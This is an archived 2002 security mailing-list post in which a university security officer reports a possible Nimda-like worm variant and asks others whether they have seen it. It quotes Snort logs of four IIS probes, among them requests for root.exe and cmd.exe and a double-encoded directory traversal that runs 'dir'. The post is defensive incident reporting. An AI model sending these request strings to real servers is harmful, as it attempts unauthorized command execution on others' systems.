New nimda variant?
From: Russell Fulton (r.fulton@auckland.ac.nz)Date: 05/01/02
- Previous message: Sam Trenholme: "A friend's cable modem Linux machine just got compromised"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: Russell Fulton <r.fulton@auckland.ac.nz> To: incidents@securityfocus.com Date: 01 May 2002 12:07:14 +1200
Over the last few days I have been seeing increasing numbers (now up to
3 or 4 per hour) of nimda like attacks against web servers.
Unlike nimda, which normally does 15 probes, this new variant only does
4 probes, as illustrated in these snort logs:
[**] WEB-IIS CodeRed v2 root.exe access [**]
04/30-21:13:15.039903 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800
len:0x7E
64.252.104.224:3817 -> 130.216.239.5:80 TCP TTL:111 TOS:0x0 ID:29214
IpLen:20 DgmLen:112 DF
***AP*** Seq: 0x4262A517 Ack: 0x6CBA93E Win: 0x4248 TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 72 6F 6F GET /scripts/roo
74 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 t.exe?/c+dir HTT
50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 P/1.0..Host: www
0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 ..Connnection: c
6C 6F 73 65 0D 0A 0D 0A lose....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
[**] WEB-IIS cmd.exe access [**]
04/30-21:13:19.727331 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800
len:0x86
64.252.104.224:3905 -> 130.216.239.5:80 TCP TTL:111 TOS:0x0 ID:29884
IpLen:20 DgmLen:120 DF
***AP*** Seq: 0x42AA87EB Ack: 0x67C77D4 Win: 0x4248 TcpLen: 20
47 45 54 20 2F 63 2F 77 69 6E 6E 74 2F 73 79 73 GET /c/winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS cmd.exe access [**]
04/30-21:13:20.547883 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800
len:0x86
64.252.104.224:4080 -> 130.216.239.5:80 TCP TTL:111 TOS:0x0 ID:30005
IpLen:20 DgmLen:120 DF
***AP*** Seq: 0x43380090 Ack: 0x74BEA3A Win: 0x4248 TcpLen: 20
47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73 GET /d/winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS _mem_bin access [**]
04/30-21:13:23.055837 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800
len:0xAB
64.252.104.224:4197 -> 130.216.239.5:80 TCP TTL:111 TOS:0x0 ID:30401
IpLen:20 DgmLen:157 DF
***AP*** Seq: 0x4394DC62 Ack: 0x76C208B Win: 0x4248 TcpLen: 20
47 45 54 20 2F 5F 6D 65 6D 5F 62 69 6E 2F 2E 2E GET /_mem_bin/..
25 32 35 35 63 2E 2E 2F 2E 2E 25 32 35 35 63 2E %255c../..%255c.
2E 2F 2E 2E 25 32 35 35 63 2E 2E 2F 77 69 6E 6E ./..%255c../winn
74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 t/system32/cmd.e
78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31 xe?/c+dir HTTP/1
2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 .0..Host: www..C
6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 onnnection: clos
65 0D 0A 0D 0A e....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
Has anyone caught one of these in a honey pot? If it really is something
new then the Anti Virus vendors need to know about it...
-- Russell Fulton, Computer and Network Security Officer The University of Auckland, New Zealand---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
- Previous message: Sam Trenholme: "A friend's cable modem Linux machine just got compromised"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
